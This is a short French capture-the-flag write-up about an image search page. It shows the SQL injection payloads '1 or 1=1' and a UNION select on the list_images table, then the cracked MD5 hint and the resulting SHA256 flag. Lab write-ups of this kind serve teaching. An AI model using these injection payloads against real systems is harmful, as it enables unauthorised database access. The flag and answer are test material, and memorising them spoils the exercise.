Sur la page de recherche d'image, search image, il y a aussi une injection SQL.
On peut afficher toutes les images de la table en recherchant : "1 or 1=1"

Apres encore plusieurs essais, on obtient cette requête. 

1 or 1=1 UNION select url, comment from list_images

On obtient une consigne qui nous invite a faire : 

If you read this just use this md5 decode lowercase then sha256 to win this flag ! : 1928e8083cf461a51303633093573c46
1928e8083cf461a51303633093573c46 (md5->plain text) albatroz albatroz (asci->sha256) f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188


Le flag est donc présent : f2a29020ef3132e01dd61df97fd33ec8d7fcd1388cc9601e7db691d17d4d6188.